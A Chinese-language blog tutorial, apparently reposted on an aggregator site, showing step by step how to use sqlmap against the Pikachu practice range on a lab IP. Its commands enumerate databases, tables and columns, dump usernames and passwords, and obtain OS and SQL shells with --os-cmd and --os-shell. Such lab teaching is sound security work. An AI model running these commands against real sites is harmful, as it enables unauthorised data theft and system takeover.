当前位置: 首页 > news >正文

【网络安全学习】SQL注入02:使用sqlmap进行注入

news 来源:原创 2024/9/20 14:54:22

1.sqlmap的基本功能

sqlmap的基本功能是对Web应用中的数据库进行自动化的检测、利用和攻击。

使用pikachu靶场进行sqlmap的基础功能使用。

1️⃣ 第一步:先检查是否有注入点:

# -u : 指定目标url,也就是指定注入点
sqlmap -u "http://192.168.187.132:8848/vul/sqli/sqli_str.php?name=zane&submit=%E6%9F%A5%E8%AF%A2"

在这里插入图片描述

2️⃣ 第二步:再使用--dbs参数获取数据库。

sqlmap -u "http://192.168.187.132:8848/vul/sqli/sqli_str.php?name=zane&submit=%E6%9F%A5%E8%AF%A2" --dbs
# --dbs : 读取数据库

在这里插入图片描述

3️⃣ 第三步:查看当前应用使用的数据库。

sqlmap -u "http://192.168.187.132:8848/vul/sqli/sqli_str.php?name=zane&submit=%E6%9F%A5%E8%AF%A2" --current-db
# --current-db : 列出当前应用所用的数据库

在这里插入图片描述

4️⃣ 第四步:列出指定数据库的所有表。

sqlmap -u "http://192.168.187.132:8848/vul/sqli/sqli_str.php?name=zane&submit=%E6%9F%A5%E8%AF%A2" --tables -D pikachu
# --tables : 获取数据库表
# -D : 指定数据库

在这里插入图片描述

5️⃣ 第五步:读取指定表中的字段名称。

sqlmap -u "http://192.168.187.132:8848/vul/sqli/sqli_str.php?name=zane&submit=%E6%9F%A5%E8%AF%A2" --columns -T users -D pikachu
# --columns : 列取字段名

在这里插入图片描述

6️⃣ 第六步:读取指定字段内容。

sqlmap -u "http://192.168.187.132:8848/vul/sqli/sqli_str.php?name=zane&submit=%E6%9F%A5%E8%AF%A2" --dump -C level,password,username -T users -D pikachu
# --dump : 为转存数据
# -C : 指定字段名称
# -T : 指定表名
# -D : 指定数据库名称。

在这里插入图片描述

在读取数据后,SQLMap将会把读取的数据转存到**SQLMap/output/目录下,文件以“[Table名].cvs**”保存.
在这里插入图片描述

通过以上步骤便完成了一个正常SQL注入并读取数据库数据的流程。

2. sqlmap参数

2.1 测试注入点权限

# 测试所有用户的权限
sqlmap -u "[URL]" --privileges
# 测试sa用户权限
sqlmap -u "[URL]" --privileges -U sa

2.2 执行Shel​l命令

# 执行net user命令
sqlmap -u "[URL]" --os-cmd="net user"
# 系统交互的shell
sqlmap -u "[URL]" --os-shell

2.3 获取当前数据库名称

sqlmap -u "[URL]" --current-db

2.4 执行SQL命令

# 返回sql交互的shell,执行sql语句
sqlmap -u "[URL]" --sql-shell

在这里插入图片描述

2.5 POST提交方式

sqlmap -u "[URL]" --data "POST参数"

2.6 显示详细的等级信息

sqlmap -u "[URL]" --dbs -v 1
# -v参数包含以下7个等级。
# 0:只显示Python的回溯、错误和关键消息;
# 1:显示信息和警告消息;
# 2:显示调试消息;
# 3:有效载荷注入;
# 4:显示HTTP请求;
# 5:显示HTTP响应头;
# 6:显示HTTP响应页面的内容。

2.7 注入HTTP请求

sqlmap -r head.txt --dbs
# head.txt中是HTTP请求的头信息

head.txt的内容大致如下:

POST /login.php HTTP/1.1
Host:www.xxx.com
User-Agent:Mozilla/5.0
username=xxx&yyy=zzz

2.8 使用SQLMap插件

sqlmap -u "[URL]" -tamper "插件名.py"

SQLMap可以使用插件,插件都保存在SQLMap目录下的tamper文件夹中,如下图所示:
在这里插入图片描述

关于SQLMap详细的使用可以参考官方说明:

https://github.com/sqlmapproject/sqlmap/wiki/Usage

🌟 以上就是SQLMap的一些基础的使用说明。 🌟

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • WPS宏实现对表格选中区域数据进行遍历读取及动态赋值
  • vs2022 开发vue带后端
  • 代码整洁之道-如何写好注释
  • 在Kylin服务器安装PostgreSQL16数据库
  • 【深度学习|目标跟踪】快速入门卡尔曼滤波!
  • 笔记本CPU天梯图(2024年8月),含AMD/骁龙等新CPU
  • 北京青蓝智慧科技:160个项目通过“数据要素×”大赛湖北分赛初赛
  • uniapp 开发公众号 h5(openid,微信支付,订阅通知)
  • C++ -- 负载均衡式在线OJ (一)
  • 大模型 - 分布式训练方法汇总
  • SQL-锁
  • 【算法】最短路径算法思路小结
  • C#中Override与New关键字的运用及实例解析
  • c# 什么是扩展方法
  • Oracle-OracleConnector
  • [ 一起学React系列 -- 8 ] React中的文件上传
  • 10个确保微服务与容器安全的最佳实践
  • canvas 五子棋游戏
  • leetcode386. Lexicographical Numbers
  • Three.js 再探 - 写一个跳一跳极简版游戏
  • 成为一名优秀的Developer的书单
  • 关于for循环的简单归纳
  • 罗辑思维在全链路压测方面的实践和工作笔记
  • 前端技术周刊 2018-12-10:前端自动化测试
  • 如何使用Mybatis第三方插件--PageHelper实现分页操作
  • 探索 JS 中的模块化
  • 腾讯优测优分享 | Android碎片化问题小结——关于闪光灯的那些事儿
  • 一天一个设计模式之JS实现——适配器模式
  • 自动记录MySQL慢查询快照脚本
  • AI又要和人类“对打”,Deepmind宣布《星战Ⅱ》即将开始 ...
  • 国内唯一,阿里云入选全球区块链云服务报告,领先AWS、Google ...
  • ​Java并发新构件之Exchanger
  • #进阶:轻量级ORM框架Dapper的使用教程与原理详解
  • $(document).ready(function(){}), $().ready(function(){})和$(function(){})三者区别
  • (C)一些题4
  • (C++)八皇后问题
  • (js)循环条件满足时终止循环
  • (八)Docker网络跨主机通讯vxlan和vlan
  • (接口封装)
  • (十三)Flink SQL
  • (转)linux自定义开机启动服务和chkconfig使用方法
  • (转)setTimeout 和 setInterval 的区别
  • *1 计算机基础和操作系统基础及几大协议
  • *setTimeout实现text输入在用户停顿时才调用事件!*
  • .cfg\.dat\.mak(持续补充)
  • .NET Framework 服务实现监控可观测性最佳实践
  • .net on S60 ---- Net60 1.1发布 支持VS2008以及新的特性
  • .net 托管代码与非托管代码
  • .NET开发不可不知、不可不用的辅助类(三)(报表导出---终结版)
  • .Net小白的大学四年,内含面经
  • .NET周刊【7月第4期 2024-07-28】
  • // an array of int
  • @Pointcut 使用
  • @requestBody写与不写的情况
  • @RequestBody与@ModelAttribute